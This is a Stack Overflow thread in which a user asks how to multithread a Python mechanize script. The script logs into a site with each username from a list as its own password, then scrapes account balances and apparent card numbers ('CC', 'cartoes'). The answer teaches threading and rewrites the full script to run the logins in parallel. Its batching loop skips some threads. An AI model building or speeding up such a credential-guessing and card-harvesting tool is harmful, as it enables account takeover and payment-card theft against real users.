0

I'm triyng to make this script with multthread without sucess, i'm new on python someone can help-me with this? This requests is working but is too slow.

import mechanize
from bs4 import BeautifulSoup as BS
entrada="entrada.txt"
saida="saida.txt"
def escreve(texto):
    with open(saida, "a") as myfile:
        myfile.write(texto)

with open(entrada) as fp:
    for user in fp:
        try:
            user = user.rstrip()
            cont=1
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 
            ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
            br.set_handle_robots(False)
            br.open("https://site")  
            br.select_form(nr=0)
            br['username']=user
            br['password']= user
            response = br.submit()
            soup = BS(br.response().read(),'lxml')
            value = soup.find_all('a')
            txt = "\nConta - Saldo[" + value[2].text+"]\n"
            print txt
            escreve(txt)
            response = br.open("https://test/sub/") 
            soup2 = BS(br.response().read(),'lxml')
            txt = "Procurando por cartoes na conta"
            print txt
            escreve(txt)
            for tds in soup2.find_all('td'):
                if (len(tds.text)>30):
                    cc = "CC["+str(cont)+"] ~> " + tds.text+"\n"
                    print cc
                    escreve(cc)
                    cont+=1
            txt = "\nTotal ["+str(cont-1)+"]\n-------------------------------------------------\n"
            escreve(txt)
        except Exception: 
            erro =  "\n[!]Erro ao logar["+user+"]\n-------------------------------------------------\n"
            escreve(erro)
            print erro

This script login and Scrap some info, this code is working fine, but is too slow. Thanks in advance!

Leandro Campos
  • 330
  • 1
  • 3
  • 13
  • You could have a look at [this question](http://stackoverflow.com/q/2846653/1585957) about multi-threading in Python. Try to rewrite your code so that it's multi-threaded and if you have issues with something in particular you can ask about that. Stackoverflow doesn't create/write code for you. – bmcculley Apr 26 '16 at 13:58
  • Since you have lxml installed why not use that to parse? – Padraic Cunningham Apr 26 '16 at 14:21

1 Answers1

0

As bmcculley as mentioned, you can refer to this question for reference, or you can refer to the docs.

How to multithread

Multithreading in Python can be done through the threading module. You will need to know how to create a thread, how to lock and join them for your case.

Create a thread

To create a thread, you will need to make a class for your thread. The class will subclass threading.Thread.

import threading
class MyThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        # Your code here

You can add arguments as a normal class would have as well.

Run a thread

After you create a class for your thread, you can then make a thread:

thread = MyThread()

and run it:

thread.start()

Locking multiple threads

Locking threads prevent threads from using a resource all at the same time. This is needed for your case as your threads will be writing to saida.txt and printing to standard output.

Let's say you have a thread WriteThread that writes some text to a file:

import threading
class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output
    def run(self):
        output.write(text)

with open("output.txt", "a+") as f:
    # Create threads
    thread_a = WriteThread("foo", f)
    thread_b = WriteThread("bar", f)
    # Start threads
    thread_a.start()
    thread_b.start()

The program may still work but it is not a good idea to allow them to access the same file concurrently. Instead, a lock is used when thread_a is writing to the file to prevent thread_b from writing to the file.

import threading
file_lock = threading.Lock()
class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output
    def run(self):
        # Acquire Lock
        file_lock.acquire()
        output.write(text)
        # Release Lock
        file_lock.release()

with open("output.txt", "a+") as f:
    # Create threads
    a = WriteThread("foo", f)
    b = WriteThread("bar", f)
    # Start threads
    a.start()
    b.start()

What file_lock.acquire() means is that the thread will wait until another thread releases file_lock so that it can use the file.

Joining multiple threads

Joining threads is a way to synchronize all the threads together. When multiple threads are joined, they will need to wait until all of the threads are complete before proceeding.

Let's say I have two threads that have different code execution times and I want both of them to complete whatever they are doing before proceeding.

import threading
import time
class WaitThread(threading.Thread):
    def __init__(self, time_to_wait, text):
        threading.Thread.__init__(self)
        self.time_to_wait = time_to_wait
        self.text = text
    def run(self):
        # Wait!
        time.sleep(self.time_to_wait)
        print self.text

# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")

threads = []
threads.append(thread_a)
threads.append(thread_b)

# Start threads
thread_a.start()
thread_b.start()

# Join threads
for t in threads:
    t.join()

print "Both threads have ended!"

In this example, thread_a will print first before thread_b prints. However, it will execute print "Both threads have ended!" only after both thread_a and thread_b have printed.

Application

Now, back to your code.

I have made quite a few changes besides implementing multithreading, locking and joining but the whole idea is to have two locks (one for printing and one for writing to your file) and to execute them in a certain limit. (too many threads is not good! Refer to this question)

import mechanize
from bs4 import BeautifulSoup as BS
import threading

# Max no. of threads allowed to be alive.
limit = 10

entrada = "entrada.txt"
saida = "saida.txt"

def write(text):
    with open(saida, "a") as f:
        f.write(text)

# Threading locks
fileLock = threading.Lock()
printLock = threading.Lock()

def print_out(text):
        printLock.acquire()
        print text
        printLock.release()

# Thread for each user
class UserThread(threading.Thread):
    def __init__(self, user):
        threading.Thread.__init__(self)
        self.user = user.rstrip()
    def run(self):
        to_file = ""
        try:
            cont = 1

            # Initialize Mechanize
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 
            br.set_handle_robots(False)
            br.open("https://site")

            # Submit form
            br.select_form(nr=0)
            br["username"] = self.user
            br["password"] = self.user
            br.submit()

            # Soup Response
            soup = BS(br.response().read(), "lxml")
            value = soup.find_all("a")
            # Write to file
            txt = "\nConta - Saldo["+value[2].text+"]\n"
            print_out(txt)
            to_file += txt

            # Retrieve response from another page
            br.open("https://test/sub")
            soup = BS(br.response().read(), "lxml")
            # Write to file
            txt = "Procurando por cartoes na conta"
            print_out(txt)
            to_file += txt


            for tds in soup.find_all("td"):
                if len(tds.text) > 30:
                    # Write to file
                    cc = "CC["+str(cont)+"] ~> "+tds.text+"\n"
                    print_out(cc)
                    to_file += cc
                    cont += 1

            txt = "\nTotal ["+str(cont-1)+"]\n-------------------------------------------------\n"
            to_file += txt
        except Exception:
            erro = "\n[!]Erro ao logar["+self.user+"]\n-------------------------------------------------\n"
            to_file += erro
            print_out(erro)

        # Write everything to file
        fileLock.acquire()
        write(to_file)
        fileLock.release()

threads = []

with open(entrada) as fp:
    for user in fp:
        threads.append(UserThread(user))

active_threads = []
for thread in threads:
    if len(active_threads) <= limit:
        # Start threads
        thread.start()
        active_threads.append(thread)
    else:
        for t in active_threads:
            # Wait for everything to complete before moving to next set
            t.join()
        active_threads = []

Minor Edits:
Changed all single quotes to double quotes
Added spacings between operators and where needed
Removed unused variable ua
Replaced unused variables response = br.submit() and response = br.open("https://test/sub") to br.submit() and br.open("https://test/sub")

Community
  • 1
  • 1
Moon Cheesez
  • 2,489
  • 3
  • 24
  • 38